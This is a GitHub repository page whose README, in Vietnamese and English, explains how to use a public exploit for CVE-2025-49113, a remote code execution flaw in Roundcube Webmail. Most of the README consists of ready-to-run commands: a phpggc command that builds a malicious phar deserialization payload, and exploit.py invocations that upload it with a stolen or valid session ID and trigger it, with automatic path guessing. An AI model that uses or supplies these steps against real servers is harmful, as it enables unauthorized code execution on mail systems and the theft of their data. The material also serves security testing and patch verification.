8000 GitHub - Yuri08loveElaina/CVE-2025-49113: Roundcube Webmail before 1.5.10 and 1.6.x before 1.6.11 allows remote code execution by authenticated users because the _from parameter in a URL is not validated in program/actions/settings/upload.php, leading to PHP Object Deserialization.
[go: up one dir, main page]
Skip to content
/ CVE-2025-49113 Public

Roundcube Webmail before 1.5.10 and 1.6.x before 1.6.11 allows remote code execution by authenticated users because the _from parameter in a URL is not validated in program/actions/settings/upload.php, leading to PHP Object Deserialization.

yuri08loveelaina.github.io
0 stars 0 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

Yuri08loveElaina/CVE-2025-49113

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

2 Commits
README.md
README.md
 
 
exploit.py
exploit.py
 
 

Repository files navigation

VIETNAMESE

  • ✅ Tính năng:

Hỗ trợ upload payload.phar

Tự động đoán path nếu không biết chính xác

Cho phép sử dụng phar:// path tùy chọn

Có tùy chọn --upload-payload, --auto-path, --direct-path

  • 🧪 Cách dùng:

    1. Tạo payload:

phpggc monolog/rce1 system 'id' -p phar -o payload.phar

    1. Upload và khai thác tự động:

python3 exploit.py https://target.com SESSIONID --upload-payload payload.phar --auto-path

    1. Upload và tự nhập path nếu biết chính xác đường dẫn :

python3 exploit.py https://target.com SESSIONID --upload-payload payload.phar --direct-path /var/www/html/temp/payload.phar

    1. Không upload, chỉ khai thác:

python3 exploit.py https://target.com SESSIONID --direct-path /var/www/html/temp/payload.phar

✅ Bạn có thể thay SESSIONID bằng session hợp lệ của Roundcube.

ENGLISH

  • ✅ Features:

Support uploading payload.phar

Automatically guess the path if not exactly known

Allow the use of phar:// path option

There are options --upload-payload, --auto-path, --direct-path

  • 🧪 How to use:

    1. Create payload:

phpggc monolog/rce1 system 'id' -p phar -o payload.phar

    1. Upload and exploit automatically:

python3 exploit.py https://target.com SESSIONID --upload-payload payload.phar --auto-path

    1. Upload and enter the path yourself if you know the exact path:

python3 exploit.py https://target.com SESSIONID --upload-payload payload.phar --direct-path /var/www/html/temp/payload.phar

    1. Do not upload, just exploit:

python3 exploit.py https://target.com SESSIONID --direct-path /var/www/html/temp/payload.phar

  • ✅ You can replace SESSIONID with a valid Roundcube session.

About

Roundcube Webmail before 1.5.10 and 1.6.x before 1.6.11 allows remote code execution by authenticated users because the _from parameter in a URL is not validated in program/actions/settings/upload.php, leading to PHP Object Deserialization.

yuri08loveelaina.github.io

Topics

cve cve-scanning cve-exploit cve-2025 cve-2025-49113

Resources

Readme
Activity

Stars

0 stars

Watchers

0 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages
0